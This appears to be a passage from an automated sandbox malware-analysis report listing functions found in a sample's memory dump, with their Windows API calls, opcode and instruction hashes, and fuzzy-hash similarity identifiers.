                                                                                                                                                                                                • Opcode ID: eaf66d541d549ce35d0b7173bc81318c446716c3833972a3082171e3945cfb6b
                                                                                                                                                                                                • Instruction ID: a4538a0261ff6c2ac210d57fc6ac5424e6a326b8b8d8802f404cc31a7d59ec03
                                                                                                                                                                                                • Opcode Fuzzy Hash: eaf66d541d549ce35d0b7173bc81318c446716c3833972a3082171e3945cfb6b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 189147B2F042208BD724DA25EC8172B7292EBD1314F5A857EEC8597342E678AC00C7DA
                                                                                                                                                                                                Function 00416B7E Relevance: 1.8, APIs: 1, Instructions: 335COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000024.00000002.3121825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_36_2_400000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 890e8e76508b01334db47f64388eac8d659fe5be4548ddbfe270fdd3745dd69d
                                                                                                                                                                                                • Instruction ID: 4d3fd89be0cb7aed4be93335616a378edd6ad360b4f2b7dd84c825cf95623c92
                                                                                                                                                                                                • Opcode Fuzzy Hash: 890e8e76508b01334db47f64388eac8d659fe5be4548ddbfe270fdd3745dd69d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9BA159B16047418FCB24CF34C891663BBE2FF56314B098A6ED49A8B792E738F845CB55
                                                                                                                                                                                                Function 0043B480 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • LdrInitializeThunk.NTDLL(0043D4FB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043B4AE
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000024.00000002.3121825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_36_2_400000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                Function 0043DBD0 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000024.00000002.3121825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_36_2_400000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                • API String ID: 2994545307-2766056989
                                                                                                                                                                                                • Opcode ID: a54cd9664649f0a3eb3b986b2c8d66ddc9897b79c163bf161da4d5756e812fe2
                                                                                                                                                                                                • Instruction ID: 1421818bc4f15c0d032df179158ed2797c8d4970c2420d5e39c05150b2e3af5d
                                                                                                                                                                                                • Opcode Fuzzy Hash: a54cd9664649f0a3eb3b986b2c8d66ddc9897b79c163bf161da4d5756e812fe2
                                                                                                                                                                                                • Instruction Fuzzy Hash: C33100B15183048BC314DF18E8C162BBBF8FB9A314F15A92DE68687391D3759908CB9A
                                                                                                                                                                                                Function 00409CC0 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000024.00000002.3121825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_36_2_400000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: \U^_
                                                                                                                                                                                                • API String ID: 0-352632802
                                                                                                                                                                                                • Opcode ID: b233260ff75ba58cbb536c0014e0eb0df055bc4e14581868770786c388d706bb
                                                                                                                                                                                                • Instruction ID: 5fa690bb4235e6f9a1b833386d74a381627e7adb8b1be8a89cbf23ee07b36487
                                                                                                                                                                                                • Opcode Fuzzy Hash: b233260ff75ba58cbb536c0014e0eb0df055bc4e14581868770786c388d706bb
                                                                                                                                                                                                • Instruction Fuzzy Hash: D011E23060C3808FD324DF3495549ABBBA5EFD7748F545A2CE4C56B281C735980A8FAA
                                                                                                                                                                                                Function 0043DCF0 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000024.00000002.3121825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_36_2_400000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                • Opcode ID: 7e2f85c664c8434edd563ad3eec3cf26f3dbdf93c28ccb518c6c18397a03e6ac
                                                                                                                                                                                                • Instruction ID: 42590aa1c4a3029240d7faad05c1566b36b776a36cf424c854185cc8c2ee326e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e2f85c664c8434edd563ad3eec3cf26f3dbdf93c28ccb518c6c18397a03e6ac
                                                                                                                                                                                                • Instruction Fuzzy Hash: 58717A31A043014BC714AF29E890A3FB7A6EFDD750F1AD43EE4868B365DB349C11878A
                                                                                                                                                                                                Function 00434BDC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetUserDefaultUILanguage.KERNELBASE ref: 00434C09
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000024.00000002.3121825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_36_2_400000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: DefaultLanguageUser
                                                                                                                                                                                                • String ID: t
                                                                                                                                                                                                • API String ID: 95929093-2238339752
                                                                                                                                                                                                • Opcode ID: 3fa4c25dce8568a0724ebcbfa99840aa77e9227c5342f76fc488d9eef6af0589
                                                                                                                                                                                                • Instruction ID: 08a8b9a0e37a212ebea7de5d04b95149eac63241ee44ff142c93878423301f38
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3fa4c25dce8568a0724ebcbfa99840aa77e9227c5342f76fc488d9eef6af0589
                                                                                                                                                                                                • Instruction Fuzzy Hash: 53F0FF34808298CFDB10DF68D4943EEBBF16F66304F1880ACC08497382D37A9A84CB12
                                                                                                                                                                                                Function 0043B420 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,0040B29B,?,00000001,?,?,?,?,?,?,?), ref: 0043B452
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000024.00000002.3121825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_36_2_400000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                • Opcode ID: c927d8c6f07db5a3335dd59de96673b47f735cea6f05c616f97ff7e83687720b
                                                                                                                                                                                                • Instruction ID: a89ac6462aaa6a8a5f29c09ee71e481237a955995f4f3f89a98fbf9f2f2a6ed3
                                                                                                                                                                                                • Opcode Fuzzy Hash: c927d8c6f07db5a3335dd59de96673b47f735cea6f05c616f97ff7e83687720b
                                                                                                                                                                                                • Instruction Fuzzy Hash: FBE0E536904210EBD2002B357C06B177678EF9B715F060436F40152115D739E801C5DE
                                                                                                                                                                                                Function 00430879 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000024.00000002.3121825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_36_2_400000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: BlanketProxy
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3890896728-0
                                                                                                                                                                                                • Opcode ID: 83941c5ff406fddefe2a55fc962621e55030b9d07cbba56e81ba996dd76ec11c
                                                                                                                                                                                                • Instruction ID: 1146a04256a80fd680d05c5d227ab35205256b262c73fed29a8c8dc337ffb545
                                                                                                                                                                                                • Opcode Fuzzy Hash: 83941c5ff406fddefe2a55fc962621e55030b9d07cbba56e81ba996dd76ec11c
                                                                                                                                                                                                • Instruction Fuzzy Hash: E00114B5249702CFE310CF64D5D8B4BBBF1AB84304F14892CE8A54B385C7B9A9498FC2
                                                                                                                                                                                                Function 0042E343 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000024.00000002.3121825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_36_2_400000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: BlanketProxy
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3890896728-0
                                                                                                                                                                                                • Opcode ID: f641e3c77b6ce86b3dd807bf46eed919c30205036380bbbe1e710ba534cd93a1
                                                                                                                                                                                                • Instruction ID: cdfd11b330a352dee93e16416f8877f043d61a2de36bf40ddff772d5b84e5129
                                                                                                                                                                                                • Opcode Fuzzy Hash: f641e3c77b6ce86b3dd807bf46eed919c30205036380bbbe1e710ba534cd93a1
                                                                                                                                                                                                • Instruction Fuzzy Hash: C601F9B86097058FE305DF28D498B5ABBF1FB89304F10881CE4958B3A1C779A949CF81
                                                                                                                                                                                                Function 0040CDF0 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CE03
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000024.00000002.3121825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_36_2_400000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Initialize
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2538663250-0
                                                                                                                                                                                                • Opcode ID: 61d928746ba4ae58ea54a0875f1c3d0382ed5290a25c5d8e3ced17899992ccae
                                                                                                                                                                                                • Instruction ID: f1973b7854016afe0481596635c710bb103935c4c1c993b3491e04eff0e8badb
                                                                                                                                                                                                • Opcode Fuzzy Hash: 61d928746ba4ae58ea54a0875f1c3d0382ed5290a25c5d8e3ced17899992ccae
                                                                                                                                                                                                • Instruction Fuzzy Hash: 01D0A7345545486BD250A75CDD0BF563A5C9703B29F400239B763D61D1D9506920C669
                                                                                                                                                                                                Function 00439B60 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,00000000,00412F5C), ref: 00439B80
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000024.00000002.3121825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_36_2_400000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                                                                                • Opcode ID: d0720c9dfbe2666778a34d5469e5ae55c8d5964329e0fb1cba2b62a2f878fbc3
                                                                                                                                                                                                • Instruction ID: 8d81dc3d2e1c71e2762f942217139477682170591cb2c618f1865e02491f5b7e
                                                                                                                                                                                                • Opcode Fuzzy Hash: d0720c9dfbe2666778a34d5469e5ae55c8d5964329e0fb1cba2b62a2f878fbc3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 76D0C935505126EBCA506B28BC15BC73A989F4A671F0708A1B4006A075C765EC919AD8
                                                                                                                                                                                                Function 00439B40 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(?,00000000,?,?,00414E57,00000400), ref: 00439B50
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000024.00000002.3121825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_36_2_400000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                • Opcode ID: a95155655fbe3eb8f0e77a05497d8175f8be12db265ae77d37b3e7249a9ffdc4
                                                                                                                                                                                                • Instruction ID: 3d340f236624c1ae318c051adf9ea47d82c8c11c3707c94fc3fa8f772c7fe72e
                                                                                                                                                                                                • Opcode Fuzzy Hash: a95155655fbe3eb8f0e77a05497d8175f8be12db265ae77d37b3e7249a9ffdc4
                                                                                                                                                                                                • Instruction Fuzzy Hash: 91C04831145224ABDA10AB15EC09B8A3AA8AF496A1F1A04A6B005660B28760AC929A98